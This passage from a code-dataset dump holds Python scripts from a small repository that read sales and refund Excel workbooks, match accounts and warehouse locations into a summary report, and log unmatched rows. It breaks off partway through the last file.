"text": "from error import processException, ErrorList, Error, NotFound\nfrom log import Logger\nimport utils\nfrom xlrd import open_workbook\n\n\nclass refundInfo:\n def __init__(self, _platform):\n self.accountList = []\n self.locationList = []\n self.refundList = []\n self.length = 0\n self.platform = _platform\n\n def add(self, _account, _location, _refund):\n self.accountList.append(_account)\n self.locationList.append(_location)\n self.refundList.append(_refund)\n self.length += 1\n\n def get(self, index):\n return self.accountList[index], self.locationList[index], self.refundList[index]\n\n\nclass Refund:\n \n def __init__(self, _summary, _notfoundTable):\n Logger.addLog(\"CREATE refund!!\")\n self.summary = _summary\n self.notfoundTable = _notfoundTable\n self.__correctCount = 0\n self.__failCount = 0\n\n \n def processRefundInfo(self, _filePath):\n\n try:\n Logger.addLog(\"OPEN REFUND FILE!! Path = \" + _filePath)\n _refundBook = open_workbook(_filePath,formatting_info=True)\n _refundSheets = _refundBook.sheets()\n\n except Exception:\n processException()\n\n for _refundsheet in _refundSheets:\n _infoType = _refundsheet.name\n\n print(\"正在处理 \" + _infoType + \" 退款金额...\")\n Logger.addLog(\"PROCESS {} 退款\".format(_infoType))\n\n _refundInfoList = self.__getRefundInfo(_refundsheet)\n self.__setRefundInfo(_infoType, _refundInfoList)\n\n\n def __getRefundInfo(self, _refundTable):\n try:\n _refundInfoList = []\n\n # use the merge cell to locate the useful cell\n for merge in _refundTable.merged_cells:\n rs, re, cs, ce = merge\n\n # ignore some merge cell\n if re-rs != 1 and ce-cs != 2:\n continue\n\n # ignore when it has no info\n if _refundTable.cell_value(re,cs) == \"\":\n continue\n \n # read the platform\n _platform = _refundTable.cell_value(rs,cs).strip().lower()\n if utils.is_contains_chinese(_platform):\n ErrorList.addError(Error(\"REFUND ERROR! 
Type = \" + _refundTable.name + \"\\tPlatform: \" + _platform, \"We can not identify the chinese as platform name\"))\n continue\n else:\n _refundInfoInstance = refundInfo(_platform)\n\n _row = re + 1 if _refundTable.cell_value(re,cs) == \"账号\" else re\n while True: \n if _row >= _refundTable.nrows: \n break\n _acclo = _refundTable.cell_value(_row,cs)\n\n if _acclo == \"\":\n break\n else:\n # split the account and location\n if '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n elif '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n else:\n _acclo = _acclo.strip()\n _accloList = _acclo.split(\" \",1)\n _account = _accloList[0].strip()\n\n # set the default value\n if len(_accloList) == 1:\n _location = \"CN\"\n else:\n _location = _accloList[1].strip()\n \n # read the refund\n _refund = _refundTable.cell_value(_row,cs+1)\n \n _refundInfoInstance.add(_account, _location, _refund)\n \n # add 1 to row\n _row += 1\n \n # add to the list\n _refundInfoList.append(_refundInfoInstance)\n except Exception:\n processException()\n\n return _refundInfoList\n\n\n def __setRefundInfo(self, _infoType, _refundInfoList):\n try:\n # if can not find correct type, return\n if _infoType not in self.summary.sheetnames:\n ErrorList.addError(Error(\"REFUND ERROR\",\"can not find correct sheet: \" + _infoType))\n return \n _refundTable = self.summary[_infoType]\n\n for _refundInstance in _refundInfoList:\n _index, _offset = utils.findPlatformIndex(_refundTable, _refundInstance.platform)\n \n # if can not find platform, send error\n if _index == -1:\n ErrorList.addError(Error(\"REFUND ERROR\",\"can not find correct platform: \" + _refundInstance.platform))\n continue\n \n # create the dictionary \n accountDict = {}\n for _row in range(_index, _index + _offset):\n _account = _refundTable[\"D\" + str(_row)].value.strip()\n _locationList = _refundTable[\"F\" + str(_row)].value.split(' ')\n _location = _locationList[1].strip() if len(_locationList) > 1 else _locationList[0].strip()\n\n # add to the dict\n accountDict[_account + '_' + _location] = _row\n\n # process the refund\n for _refundIndex in range(0, _refundInstance.length):\n _refundAccount, _refundLocation, _refund = _refundInstance.get(_refundIndex)\n\n if _refundAccount + '_' + _refundLocation in accountDict:\n self.__correctCount += 1\n _refundTable[\"I\" + str(accountDict[_refundAccount + '_' + _refundLocation])].value = _refund\n else:\n self.__processRefundNotFound(_infoType, _refundInstance.platform, _refundAccount, _refundLocation, _refund)\n except Exception:\n processException()\n\n return\n\n\n def __processRefundNotFound(self, _infoType, _platform, _refundAccount, _refundLocation, _refund):\n\n try:\n # find the account and location in the notfound table\n for _row in range(2, self.notfoundTable.max_row + 1):\n _nfType = self.notfoundTable[\"A\" + str(_row)].value\n _nfPlatform = self.notfoundTable[\"B\" + str(_row)].value\n _nfAccount = self.notfoundTable[\"C\" + str(_row)].value\n _nfLocation = self.notfoundTable[\"E\" + str(_row)].value.split(' ')[1]\n\n if _infoType == _nfType and _platform == _nfPlatform and _refundAccount == _nfAccount and _refundLocation == _nfLocation:\n self.notfoundTable[\"H\" + str(_row)] = _refund\n return\n\n except Exception:\n processException()\n return\n\n\n # if do not be found, we insert and send warning\n _row = 
self.notfoundTable.max_row + 1\n self.notfoundTable[\"A\" + str(_row)].value = _infoType\n self.notfoundTable[\"B\" + str(_row)].value = _platform\n self.notfoundTable[\"C\" + str(_row)].value = _refundAccount\n self.notfoundTable[\"E\" + str(_row)].value = \"unkown \" + _refundLocation\n self.notfoundTable[\"I\" + str(_row)].value = _refund\n\n # count the failcount and send the error\n self.__failCount += 1\n ErrorList.addError(NotFound(\"REFUND ERROR!\\tType = \" + _infoType + \"\\tPlatform: \" + _platform, \"Can not match the refund account and location!!\"))\n\n\n def getFailCount(self):\n return self.__failCount\n\n def getCorrectCount(self):\n return self.__correctCount"
},
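Refund.__getRefundInfo above accepts three spellings of the account/location cell: a location in full-width or half-width parentheses, a space-separated pair, or a bare account that defaults to location "CN". A standalone sketch of those splitting rules for reference (the helper name split_account_location is ours, not the repo's):

def split_account_location(acclo):
    # try half-width and full-width parentheses, as refund.py does
    for lparen, rparen in (('(', ')'), ('(', ')')):
        if lparen in acclo:
            account, rest = acclo.split(lparen, 1)
            return account.strip(), rest.split(rparen, 1)[0].strip()
    parts = acclo.strip().split(' ', 1)
    return parts[0].strip(), (parts[1].strip() if len(parts) > 1 else 'CN')

assert split_account_location('shop01(US)') == ('shop01', 'US')
assert split_account_location('shop02 DE') == ('shop02', 'DE')
assert split_account_location('shop03') == ('shop03', 'CN')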
{
"alpha_fraction": 0.5633175373077393,
"alphanum_fraction": 0.5802950263023376,
"avg_line_length": 26.35877799987793,
"blob_id": "83ad6ef4b71050d044a9ebf7433751f57b485185",
"content_id": "987e6a4122f24431629032194903c6bc9507190c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3607,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 131,
"path": "/oldVesion/doit.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import xlrd\nimport xlwt\n\n# define data class\nclass info:\n account = \"undefined\"\n name = \"undefined\"\n location = \"undefined\"\n salesAmount = 0.0\n profitRate = 0.0\n normal = 1 # to mark the cell is nornal or not\n\n\n\ndef getInfo(filePath):\n # open the file\n data = xlrd.open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(0,1)\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n if _infoType == \"C类\" : _infoType += (\"打底裤\")\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n _row = 0\n nrow = table.max_row\n\n # for each module to find out useful info\n while _row < nrow:\n # add 1 to _row to ignore the title\n _row += 1\n\n # create the module info instance\n _infoInstance = info()\n\n _infoInstance.name = table.cell(_row,1).value.split('/',2)[0]\n if _infoInstance.name == \"\":\n _infoInstance.name = '/'\n\n # to process the account/location cell\n row_3 = table.cell(_row,2).value\n _infoInstance.account = row_3.split('/')[0]\n # remove the charactor \"仓\"\n _infoInstance.location = row_3.split('/')[1][0:-1] \n\n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == None:\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 3\n\n data.release_resources()\n return _platform, _infoType, _infoList\n\n\n\n\n\n\n\n# open the file\nxlrd.Book.encoding = \"utf8\"\ndata = xlrd.open_workbook(\"A.xlsx\")\n\n# for each file to process data \n\n\n# to store this file data which platform and type is\nplatform = \"wish\"\ninfoType = \"A类\"\n\n# use info list to temporary store data \ninfoList = []\n\n# for each table to process data\nsheets = data.sheets()\nfor table in sheets:\n row = 0\n nrow = table.nrows\n\n # for each module to find out useful info\n while row < nrow:\n # add 1 to row to ignore the title\n row += 1\n\n # create the module info instance\n infoInstance = info()\n\n infoInstance.name = table.cell_value(row,1).split('/',2)[0]\n\n # to process the account/location cell\n row_2 = table.cell_value(row,2)\n infoInstance.account = row_2.split('/')[0]\n # remove the charactor \"仓\"\n infoInstance.location = row_2.split('/')[1][0:-1] \n\n # to judge this module is normal or not\n row_3 = table.cell_value(row,3)\n if row_3 == '':\n infoInstance.normal = 0\n infoInstance.salesAmount = table.cell_value(row,4)\n else :\n infoInstance.salesAmount = table.cell_value(row,3)\n infoInstance.profitRate = table.cell_value(row+1,4)\n\n # append the module instance into the list\n infoList.append(infoInstance)\n\n # add 3 to variable row to move to next module \n row += 3\n\n\n# open report to write down\n# summary = xlwt.w\n\n# for each data in infoList to write down in the report\n# for infoInstance in infoList:\n \n"
},
{
"alpha_fraction": 0.6982905864715576,
"alphanum_fraction": 0.7059829235076904,
"avg_line_length": 23.914894104003906,
"blob_id": "0c3dd5d7f4b1f4efa2df253b428577279d206ca1",
"content_id": "887d6ceed12e9ceb1001ac6ea2ca9c321dd29bd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 47,
"path": "/oldVesion/test.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import xlrd\nimport xlwt\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\nfrom openpyxl.styles import colors\nfrom openpyxl.styles import Font, Color\n\n# open the file\n# xlrd.Book.encoding = \"utf8\"\n# data = xlrd.open_workbook(\"A.xlsx\")\n# summary = xlrd.open_workbook(\"B.xls\",formatting_info=True)\n\n# table = summary.sheet_by_index(0)\n\n# print(table.merged_cells)\n\nstr = \"Hel lo\"\nprint(str.split(\" \",1))\n\n# open report to write down\n# summary = xlrd.open_workbook(\"../data/refund.xls\",formatting_info=True)\n# newbook = Workbook()\n\n# find the infotype table\n# reportTable = summary.sheet_by_index(0)\n# print(reportTable.name)\n\n# for merge in reportTable.merged_cells:\n# rs, re, cs, ce = merge\n# print(1)\n# print(merge)\n\n# newsheet = newbook.create_sheet(\"test\")\n# newsheet = summary.copy_worksheet(reportTable)\n\n# # find the index of platform\n# mergeList = reportTable.merged_cells\n\n# print(mergeList)\n# fontStyle = Font(name=\"Calibri\", size=12, color=colors.BLACK)\n# reportTable['G3'].value = \"safdasfa\"\n# reportTable['G3'].font = fontStyle\n# summary.save(\"output.xlsx\")\n\n# newbook.save(\"output.xlsx\")\n# summary.close()\n# newbook.close()"
},
{
"alpha_fraction": 0.5388237237930298,
"alphanum_fraction": 0.5449709892272949,
"avg_line_length": 32.703975677490234,
"blob_id": "071f4eaca4eee3807c4eef71fc795e6159afdd9b",
"content_id": "d5c18e2634f72c5def0ddc7fda2a4004b2f8e16f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23799,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 679,
"path": "/oldVesion/dev.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from os import path as osPath\nfrom os import listdir,system\nimport sys\nimport linecache\nfrom datetime import datetime\nfrom xlrd import open_workbook\nfrom time import sleep\nfrom threading import Thread\nfrom openpyxl import load_workbook,Workbook\n\n# define data class\nclass info:\n def __init__(self):\n self.account = \"undefined\"\n self.name = \"undefined\"\n self.location = \"undefined\"\n self.salesAmount = 0.0\n self.profitRate = 0.0\n self.normal = True # to mark the cell is nornal or not \n\n\nclass refundInfo:\n def __init__(self, _platform):\n self.accountList = []\n self.locationList = []\n self.refundList = []\n self.length = 0\n self.platform = _platform\n\n def add(self, _account, _location, _refund):\n self.accountList.append(_account)\n self.locationList.append(_location)\n self.refundList.append(_refund)\n self.length += 1\n\n def get(self, index):\n return self.accountList[index], self.locationList[index], self.refundList[index]\n\n\nclass error:\n TYPE_ERROR = 1\n TYPE_WARNING = 2\n TYPE_NOTFOUND = 3\n\n def __init__(self,_path,_message, _type = TYPE_ERROR):\n self.errorType = _type\n self.path = _path\n self.message = _message\n\n def printError(self, _type):\n if _type == error.TYPE_ERROR:\n print(\"ERROR: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n \n elif _type == error.TYPE_WARNING:\n print(\"Warning: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n elif _type == error.TYPE_NOTFOUND:\n print(\"PATH: \" + self.path)\n\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\ndef processException():\n exc_type, exc_obj, tb = sys.exc_info()\n f = tb.tb_frame\n lineno = tb.tb_lineno\n filename = f.f_code.co_filename\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n\n # send error\n errorList.append(error(filename,'APPLICATION EXCEPTION (LINE {} \"{}\"): {}'.format(lineno, line.strip(), exc_obj)))\n print('APPLICATION EXCEPTION (LINE {} \"{}\"): {}'.format(lineno, line.strip(), exc_obj))\n\n # stop the system and exit\n system(\"pause\")\n exit()\n \n\n\ndef getReportPath(path, _files, _tips, _onlyXlsx = True):\n _count = 0\n _pathList = []\n\n _isXls = False\n\n # print file list\n for _file in _files:\n # 去除文件夹,非.xlsx文件以及临时文件\n if (not osPath.isdir(path + '/' + _file)) and \"~$\" not in _file:\n if \".xlsx\" in _file or (not _onlyXlsx and \".xls\" in _file):\n _count += 1\n _pathList.append(path + '/' + _file)\n print(str(_count) + \"、\" + _file)\n\n \n # only at the onlyxlsx mode, will send the warning\n if _onlyXlsx and \".xls\" in _file and \".xlsx\" not in _file :\n _isXls = True\n\n # do not find file\n if _count == 0:\n errorList.append(error(\"./\", \"do not find files\", error.TYPE_ERROR))\n print(\"do not find files\")\n return None\n\n # warning find .xls file\n if _isXls:\n errorList.append(error(\"./\", \"We have found .xls file in report list\", error.TYPE_WARNING))\n print(\"We have found .xls file, but the software can not read the .xls as report table!\")\n print(\"Please convert it into .xlsx file, if you want to read it!!!\")\n\n # input file number\n _index = 0\n while _index <= 0 or _index > _count:\n _input = input(\"input number to choose \"+ _tips +\" file:\")\n if _input == \"\" or not _input.isdigit():\n continue\n \n _index = int(_input)\n if _index <= 0 or _index > _count:\n print(\"wrong number\\n\")\n \n # output \\n\n print(\"\\n\")\n \n return _pathList[_index - 1]\n\n\ndef 
findPlatformIndex(_reportTable, _platform):\n try:\n # store the merge cell's info\n mergeList = _reportTable.merged_cells\n mergeDict = {}\n for mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n # to find the index of platform\n isFindPlatform = False\n index = 1\n while index < _reportTable.max_row:\n _reportPlatform = _reportTable[\"C\" + str(index)].value\n if _reportPlatform is None:\n index += 1\n continue\n _reportPlatform = _reportPlatform if not _reportPlatform.strip().isalpha() else _reportPlatform.lower()\n if _reportPlatform.strip() == _platform.strip().lower():\n isFindPlatform = True\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n offset = mergeDict[index] + 1 if index in mergeDict else 1\n \n except Exception:\n processException()\n return -1, 0\n\n else:\n if isFindPlatform:\n return index, offset\n else:\n return -1, 0\n\n\ndef processRefundNotFound(_infoType, _platform, _refundAccount, _refundLocation, _refund):\n\n try:\n # find the account and location in the notfound table\n for _row in range(2, notfoundTable.max_row + 1):\n _nfType = notfoundTable[\"A\" + str(_row)].value\n _nfPlatform = notfoundTable[\"B\" + str(_row)].value\n _nfAccount = notfoundTable[\"C\" + str(_row)].value\n _nfLocation = notfoundTable[\"E\" + str(_row)].value.split(' ')[1]\n\n if _infoType == _nfType and _platform == _nfPlatform and _refundAccount == _nfAccount and _refundLocation == _nfLocation:\n notfoundTable[\"H\" + str(_row)] = _refund\n return\n\n except Exception:\n processException()\n return\n\n\n # if do not be found, we insert and send warning\n _row = notfoundTable.max_row + 1\n notfoundTable[\"A\" + str(_row)].value = _infoType\n notfoundTable[\"B\" + str(_row)].value = _platform\n notfoundTable[\"C\" + str(_row)].value = _refundAccount\n notfoundTable[\"E\" + str(_row)].value = \"unkown \" + _refundLocation\n notfoundTable[\"I\" + str(_row)].value = _refund\n\n # count the failcount and send the error\n global failCount\n failCount += 1\n errorList.append(error(\"REFUND ERROR!\\tType = \" + _infoType + \"\\tPlatform: \" + _platform, \"Can not match the refund account and location!!\", error.TYPE_NOTFOUND))\n\n\ndef getRefundInfo(_refundTable):\n try:\n _refundInfoList = []\n\n # use the merge cell to locate the useful cell\n for merge in _refundTable.merged_cells:\n rs, re, cs, ce = merge\n\n # ignore some merge cell\n if re-rs != 1 and ce-cs != 2:\n continue\n\n # ignore when it has no info\n if _refundTable.cell_value(re,cs) == \"\":\n continue\n \n # read the platform\n _platform = _refundTable.cell_value(rs,cs).strip().lower()\n if is_contains_chinese(_platform):\n errorList.append(error(\"REFUND ERROR! 
Type = \" + _refundTable.name + \"\\tPlatform: \" + _platform, \"We can not identify the chinese as platform name\"))\n continue\n else:\n _refundInfoInstance = refundInfo(_platform)\n\n _row = re + 1 if _refundTable.cell_value(re,cs) == \"账号\" else re\n while True:\n _acclo = _refundTable.cell_value(_row,cs)\n\n if _acclo == \"\":\n break\n else:\n # split the account and location\n if '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n elif '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n else:\n _acclo = _acclo.strip()\n _accloList = _acclo.split(\" \",1)\n _account = _accloList[0].strip()\n\n # set the default value\n if len(_accloList) == 1:\n _location = \"CN\"\n else:\n _location = _accloList[1].strip()\n \n # read the refund\n _refund = _refundTable.cell_value(_row,cs+1)\n \n _refundInfoInstance.add(_account, _location, _refund)\n \n # add 1 to row\n _row += 1\n \n # add to the list\n _refundInfoList.append(_refundInfoInstance)\n except Exception:\n processException()\n\n return _refundInfoList\n\ndef setRefundInfo(_infoType, _refundInfoList):\n try:\n # if can not find correct type, return\n if _infoType not in summary.sheetnames:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct sheet: \" + _infoType))\n return \n _refundTable = summary[_infoType]\n\n for _refundInstance in _refundInfoList:\n _index, _offset = findPlatformIndex(_refundTable, _refundInstance.platform)\n \n # if can not find platform, send error\n if _index == -1:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct platform: \" + _refundInstance.platform))\n continue\n \n # create the dictionary \n accountDict = {}\n for _row in range(_index, _index + _offset):\n _account = _refundTable[\"D\" + str(_row)].value.strip()\n _locationList = _refundTable[\"F\" + str(_row)].value.split(' ')\n _location = _locationList[1].strip() if len(_locationList) > 1 else _locationList[0].strip()\n\n # add to the dict\n accountDict[_account + '_' + _location] = _row\n\n # process the refund\n for _refundIndex in range(0, _refundInstance.length):\n _refundAccount, _refundLocation, _refund = _refundInstance.get(_refundIndex)\n\n if _refundAccount + '_' + _refundLocation in accountDict:\n global correctCount\n correctCount += 1\n _refundTable[\"I\" + str(accountDict[_refundAccount + '_' + _refundLocation])].value = _refund\n else:\n processRefundNotFound(_infoType, _refundInstance.platform, _refundAccount, _refundLocation, _refund)\n except Exception:\n processException()\n\n return\n\ndef processRefundInfo(_filePath):\n\n try:\n _refundBook = open_workbook(_filePath,formatting_info=True)\n _refundSheets = _refundBook.sheets()\n\n except Exception:\n processException()\n\n for _refundsheet in _refundSheets:\n _infoType = _refundsheet.name\n\n print(\"正在处理 \" + _infoType + \" 退款金额...\")\n\n _refundInfoList = getRefundInfo(_refundsheet)\n setRefundInfo(_infoType, _refundInfoList)\n \n\ndef getInfoByXlrd(filePath):\n try:\n # open the file\n data = open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(1,0).split('/')[0]\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n # ignore the sheet of 
\"原始\"\n if table.name == \"原始\":\n continue\n\n _row = 1\n nrow = table.nrows\n\n # for each module to find out useful info\n while _row < nrow:\n # if find the none row, add 1 to row for finding the next\n if table.cell(_row,1).value == \"\":\n _row += 1\n continue\n\n # if account is none, the wo think the line is bad\n row_3List = table.cell(_row,2).value.split('/')\n if row_3List[0] == \"\" or is_contains_chinese(row_3List[0]):\n _row += 1\n continue\n\n # create the module info instance\n _infoInstance = info()\n\n # to process the account/location cell\n _infoInstance.account = row_3List[0]\n _infoInstance.location = row_3List[1] if not is_contains_chinese(row_3List[1]) else row_3List[1][0:-1]\n\n # if cell has no name, then wo think this line is bad \n _nameInTable = table.cell(_row,1).value.split('/',2)\n _infoInstance.name = \"/\" if _nameInTable[0] == \"\" else _nameInTable[0]\n if _infoType == \"类\": _infoType = _nameInTable[1]\n \n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == \"\":\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 2\n\n data.release_resources()\n\n except Exception:\n processException()\n return \"\", \"\", []\n else :\n return _platform, _infoType, _infoList\n\n\ndef processNotFoundInfo(_platform, _infoType, _infoInstance):\n _row = notfoundTable.max_row + 1\n notfoundTable[\"A\" + str(_row)] = _infoType\n notfoundTable[\"B\" + str(_row)] = _platform\n notfoundTable[\"C\" + str(_row)] = _infoInstance.account\n notfoundTable[\"D\" + str(_row)] = _infoInstance.name\n notfoundTable[\"E\" + str(_row)] = _infoInstance.name + \" \" + _infoInstance.location\n # to judge the normal is true or not\n if _infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n notfoundTable[\"F\" + str(_row)].value = _infoInstance.salesAmount\n notfoundTable[\"G\" + str(_row)].value = _infoInstance.profitRate\n else :\n # else write down the margin \n notfoundTable[\"I\" + str(_row)].value = _infoInstance.salesAmount\n\n\ndef setInfo(_platform, _infoType, _infoList, _path):\n try:\n # find the infotype table\n if _infoType not in summary.sheetnames:\n errorList.append(error(_path,\"can not find correct sheet: \" + _infoType))\n return \n reportTable = summary[_infoType]\n\n # to find the index of platform\n index, offset = findPlatformIndex(reportTable, _platform)\n if index == -1:\n errorList.append(error(_path, \"can not find correct platform: \" + _platform))\n return\n\n # for each data in infoList to write down in the report\n for infoInstance in _infoList:\n isFind = False # to mark the account is finded or not\n\n for row in range(index, index + offset):\n reportAccount = reportTable[\"D\" + str(row)].value\n reportLocationList = reportTable[\"F\" + str(row)].value.split(' ')\n reportLocation = reportLocationList[1] if len(reportLocationList) > 1 else reportLocationList[0]\n\n # to match corret account and location row\n if infoInstance.account == reportAccount and infoInstance.location == reportLocation :\n isFind = True\n global correctCount\n correctCount += 1\n\n # if the name is wrong, then change the name \n reportName = reportTable[\"E\" + str(row)].value\n if infoInstance.name != reportName : \n reportTable[\"E\" + 
str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + infoInstance.location\n\n # to judge the normal is true or not\n if infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n # else write down the margin \n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # write down and break the for loop\n break\n\n if isFind:\n continue\n else:\n global failCount\n failCount += 1\n errorList.append(error(_path, \"存在新增数据,请自行插入,数据已录入 notfound.xlsx\", error.TYPE_NOTFOUND))\n processNotFoundInfo(_platform, _infoType, infoInstance)\n\n # 由于有合并表格的存在,插入一行真的极其的烦,功能后面在迭代吧,我不行了\n except Exception:\n processException()\n\n \ndef getInfoWithTime(_lastpath):\n print(\"正在处理文件:\" + _lastpath)\n _startTime = datetime.now()\n\n try:\n _platform, _infoType, _infoList = getInfoByXlrd(_lastpath)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"\\r文件已读取完成,用时 \" + str(_interval) + \" 秒\")\n\n except Exception:\n processException()\n return \"\", \"\", []\n \n else:\n return _platform, _infoType, _infoList\n\n\ndef setInfoWithTime(_platform, _infoType, _infoList, _path):\n print(\"正在写入数据...\\r\".format(),end=\"\")\n _startTime = datetime.now()\n\n # ignore writing when info list is none\n if _infoList == []:\n errorList.append(error(_path, \"读取数据为空,注意检查\", error.TYPE_WARNING))\n print(\"读取数据为空,已跳过写入!!\")\n return \n\n try:\n setInfo(_platform, _infoType, _infoList, _path)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"数据已处理完成,用时 \" + str(_interval) + \" 秒\\n\")\n\n except Exception:\n processException()\n\n\ndef save(_fileName):\n print(\"\\n正在保存文件\")\n _fileName = \"output\" if _fileName == \"\" else _fileName\n\n try:\n summary.save(path + \"/\" + _fileName + \".xlsx\")\n notfound.save(path + \"/notfound.xlsx\")\n\n except Exception:\n processException()\n print(\"文件保存失败,请检查 \" + _fileName + \".xlsx 或 notfound.xlsx 是否在打开状态。请关闭文件后重试!!!\")\n\n else:\n print(\"保存文件成功,路径:\" + path + \"/\" + _fileName + \".xlsx\") \n\n\ndef get_user_input(user_input_ref):\n user_input_ref[0] = input(\"输入文件名(直接回车或 20 秒后将使用默认文件名保存):\")\n\n\ndef initNotFoundTable():\n notfoundTable[\"A1\"] = \"类型\"\n notfoundTable[\"B1\"] = \"渠道\"\n notfoundTable[\"C1\"] = \"账号\"\n notfoundTable[\"D1\"] = \"姓名\"\n notfoundTable[\"E1\"] = \"姓名/仓\"\n notfoundTable[\"F1\"] = \"销售额\"\n notfoundTable[\"G1\"] = \"利润率\"\n notfoundTable[\"H1\"] = \"退款金额\"\n notfoundTable[\"I1\"] = \"毛利\"\n\n\ndef processDir(_filepath):\n _files = listdir(_filepath) \n\n for _file in _files:\n _lastpath = _filepath + '/' + _file\n\n #判断是否是文件夹\n if osPath.isdir(_lastpath): \n # 递归搜索\n processDir(_lastpath)\n else:\n # to process each file\n \n # ignore the files which not .xlsx or .xls file\n if not (\".xls\" in _file):\n continue\n else:\n # ignore the temporary files\n if \"~$\" in _file:\n errorList.append(error(_lastpath, \"find \\'~$\\' in the file name, do use \\'~$\\' for file name in case we see it as temporary files\", error.TYPE_WARNING))\n continue\n\n platform, infoType, infoList = getInfoWithTime(_lastpath)\n setInfoWithTime(platform, infoType, infoList, _lastpath)\n\n\ndef openReport(_reportPath):\n print(\"正在读取汇总文件\\r\")\n try:\n _summary = load_workbook(_reportPath)\n except Exception:\n print(\"读取汇总文件发生错误,可能汇总文件已被打开,请关闭文件后重试!!\")\n processException()\n return None\n else: 
\n print(\"汇总文件读取成功:\" + _reportPath + \"\\n\")\n return _summary\n\n\n\ndef printMessage(_type):\n count = 0\n for errorM in errorList:\n if errorM.errorType == _type:\n count += 1\n errorM.printError(_type)\n\n return count\n\n\n\n# --------------------------------------------------------------------------------------------- #\n# main function #\n# --------------------------------------------------------------------------------------------- #\n\n\n#文件夹目录\npath = \"../data\"\n#得到文件夹下的所有文件名称\nfiles= listdir(path) \n\n# mark the message throught the process\nerrorList = []\ncorrectCount = 0\nfailCount = 0\n\n# open report to write down\nreportPath = getReportPath(path, files, \"summary\")\nrefundPath = getReportPath(path, files, \"refund\", _onlyXlsx = False)\n\n# start timer\nstartTime = datetime.now()\n\nif reportPath is not None:\n # open the report\n summary = openReport(reportPath)\n if summary is not None : \n\n # init notfound table\n notfound = Workbook()\n notfoundTable = notfound.active\n initNotFoundTable()\n\n #遍历文件夹\n for file in files: \n filePath = path + '/' + file\n #判断是否是文件夹\n if osPath.isdir(filePath): \n processDir(filePath)\n\n processRefundInfo(refundPath)\n\n # Declare a mutable object so that it can be pass via reference\n user_input = [None]\n\n mythread = Thread(target=get_user_input, args=(user_input,))\n mythread.daemon = True\n mythread.start()\n\n for increment in range(0, 21):\n sleep(1)\n if user_input[0] is not None:\n save(user_input[0])\n break\n # print (\"\\r输入文件名(直接回车或 \".format() + str(20 - increment) + \" 秒后将使用默认文件名保存):\", end=\"\")\n\n if user_input[0] is None:\n save(\"output\")\n\n # print the error list\n print(\"\\n操作过程有以下错误:\")\n errorCount = printMessage(error.TYPE_ERROR)\n\n print(\"\\n操作过程有以下警告:\")\n warningCount = printMessage(error.TYPE_WARNING)\n\n print(\"\\n存在新增数据,请自行插入,数据已录入 notfound.xlsx\")\n acount = printMessage(error.TYPE_NOTFOUND)\n warningCount += 1 if acount != 0 else 0\n\n endTime = datetime.now()\n interval = (endTime-startTime).seconds\n\n print(\"\\n已处理完成! 共耗时 \" + str(interval) + \" 秒\")\n print(\"成功命中数据 \" + str(correctCount) + \" 条,失败命中数据 \" + str(failCount) + \" 条。\")\n print(\"出现错误 \" + str(errorCount) + \" 项,警告 \" + 